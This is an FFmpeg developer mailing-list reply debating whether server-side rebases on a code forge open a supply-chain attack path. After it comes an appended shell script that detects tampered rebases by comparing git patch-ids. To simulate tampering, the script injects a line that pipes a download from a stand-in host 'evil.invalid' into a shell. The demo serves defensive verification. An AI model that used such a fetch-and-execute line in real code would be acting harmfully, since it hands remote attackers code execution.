From mboxrd@z Thu Jan 1 00:00:00 1970
Date: Mon, 4 Aug 2025 22:15:53 +0200
To: FFmpeg development discussions and patches
References: <20250803153139.GC29660@pb2> <20250803190234.GE29660@pb2>
In-Reply-To: <20250803190234.GE29660@pb2>
Subject: Re: [FFmpeg-devel] rebasing security
From: Alexander Strasser via ffmpeg-devel
Reply-To: FFmpeg development discussions and patches
Cc: Alexander Strasser
List-Id: FFmpeg development discussions and patches
Content-Type: text/plain; charset="us-ascii"

Hi Michael, hi all!

I think it's a good time to bring stuff like this up for discussion.

On 2025-08-03 21:02 +0200, Michael Niedermayer wrote:
>
> On Sun, Aug 03, 2025 at 05:31:39PM +0200, Michael Niedermayer wrote:
> [...]
> > The solutions are obvious:
> > 1. ignore security and supply chain attacks
> > 2. use merges not rebases on the server
> > 3. rebase locally, use fast forward only
> > 4. verify on server rebases
>
> Maybe not everyone understood the problem. So let me try a different
> explanation.
> Without any signatures.
>
> In the ML workflow: (for simplicity we assume reviewer and committer is the same person)
> 1. someone posts a patch
> 2. patch is locally applied or rebased
> 3. commit is reviewed
> 4. commit is tested
> 5. commit is pushed
>
> Here the only way to get bad code in is through the reviewer.
> If the reviewer doesn't miss anything and his setup is not compromised
> then what he pushes is the reviewed code.
>
> If it's manipulated after it's pushed, git should light up like a Christmas tree
> on the next "git pull --rebase".
>
>
> With the rebase on webapp (gitlab or forgejo) workflow:
> 1. someone posts a pull request
> 2. pr is reviewed
> 3. pr is approved
> 4. pr is rebased
> 5. pr is tested
> 6. pr is pushed
>
> Now here of course the same reviewer trust or compromised scenarios exist,
> but we also have an extra one and that is the server:
> because the server strips the signatures during rebase it can modify the
> commit. And this happens after review, and because a rebase was literally
> requested by the reviewer it's not likely to be noticed as something out of
> place.

If I understand the original point you wanted to discuss correctly, then this
is not a question of rebase or merge but one of letting **commits happen on
the forge**. If it happens, it bears the possibility of modification on the
server the forge is running on.

TL;DR: I think it's fine the way it's set up now.

I'm not against letting rebase/merges happen on the server, because otherwise
we would lose a lot of advantages and comfort we get by using a forge for PRs.

The only alternative I see is to do PRs on the forge and do the merging
manually by the same person that ensures the reviewed PR is not changed and
pushes (after rebase or with a clean merge commit) from their machine.

Just to be clear, here I'm talking about stuff happening for rebase/merge on
the server. There is another thing that is done sometimes that I'm against,
and that is creating and pushing commits from runners.
That is a way too dangerous practice IMHO and I would argue we should never do it.

Best regards,
  Alexander

PS. Maybe there are some less conventional possibilities I'm missing that
could be implemented. So if you see any that seem worth pursuing, it might be
interesting.

_______________________________________________
ffmpeg-devel mailing list
ffmpeg-devel@ffmpeg.org
https://ffmpeg.org/mailman/listinfo/ffmpeg-devel

To unsubscribe, visit link above, or email
ffmpeg-devel-request@ffmpeg.org with subject "unsubscribe".
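As an added example (it is not FFmpeg tooling and not something either poster shipped), here is one concrete form of what Michael lists as option 4, "verify on server rebases", and what Alexander's concern about modification on the forge calls for: a rebase always rewrites commit hashes and drops the signatures, but `git patch-id --stable` hashes only the diff content, so the reviewed commits and the rebased commits must produce the same set of patch-ids. The check has to run on the reviewer's own machine, not on the forge, since a compromised server can report whatever it likes. The repository layout, tag names and the injected line below are all made up for the demo.

```shell
#!/bin/sh
# Added example, not FFmpeg project tooling: detect a forge-side rebase that
# changed the reviewed patches. Commit hashes always change on rebase, but
# `git patch-id --stable` hashes only the diff content, so an honest rebase
# yields the same patch-ids as the reviewed commits and a tampered one does not.
# Tags, branches and file contents below are invented for the demonstration.

# verify_rebase REPO REVIEWED_RANGE REBASED_RANGE
# Returns 0 when the rebased range carries exactly the reviewed diffs (same
# content, ignoring only context line numbers and whitespace), 1 otherwise.
verify_rebase() {
    repo=$1 reviewed=$2 rebased=$3
    want=$(git -C "$repo" log -p --no-color "$reviewed" | git patch-id --stable | cut -d' ' -f1 | sort)
    got=$(git -C "$repo" log -p --no-color "$rebased"  | git patch-id --stable | cut -d' ' -f1 | sort)
    [ -n "$want" ] || return 1      # nothing reviewed: refuse rather than pass vacuously
    [ "$want" = "$got" ]
}

# demo: build a throwaway repo, perform an honest rebase and a tampered
# "rebase" of the same reviewed commit, and report the verdict for each.
demo() {
    tmp=$(mktemp -d)
    g() { git -C "$tmp" "$@"; }
    g init -q
    g config user.email dev@example.invalid
    g config user.name "Example Dev"
    g config commit.gpgsign false

    # history: base <- (pr: add feature) ; base <- (main-tip: unrelated change)
    echo base > "$tmp/file";       g add file;    g commit -qm "base";        g tag base
    g checkout -q -b pr base
    echo feature > "$tmp/feature"; g add feature; g commit -qm "add feature"; g tag pr-reviewed
    g checkout -q base
    echo other > "$tmp/other";     g add other;   g commit -qm "unrelated";   g tag main-tip

    # honest rebase: same diff, new parent, new hash
    g checkout -q pr
    g rebase -q main-tip >/dev/null 2>&1
    if verify_rebase "$tmp" base..pr-reviewed main-tip..pr; then honest=ok; else honest=changed; fi

    # tampered "rebase": same commit message and author, one extra line slipped in
    g checkout -q -b tampered main-tip
    g cherry-pick pr-reviewed >/dev/null 2>&1
    echo 'system("curl evil.invalid | sh")' >> "$tmp/feature"
    g add feature
    g commit -q --amend --no-edit
    if verify_rebase "$tmp" base..pr-reviewed main-tip..tampered; then tampered=ok; else tampered=changed; fi

    rm -rf "$tmp"
    echo "honest=$honest tampered=$tampered"
}

demo
```

Two caveats a reviewer should keep in mind. `git patch-id` deliberately ignores whitespace, so a whitespace-only edit (an indentation change in a Makefile or Python file, for instance) would pass this check; `git range-diff base..pr-reviewed main-tip..pr` or a byte-exact `git diff pr-reviewed pr` of the resulting trees is stricter. And a rebase that had to resolve conflicts legitimately produces different diffs, which is exactly the case where the result needs a second look rather than an automatic pass.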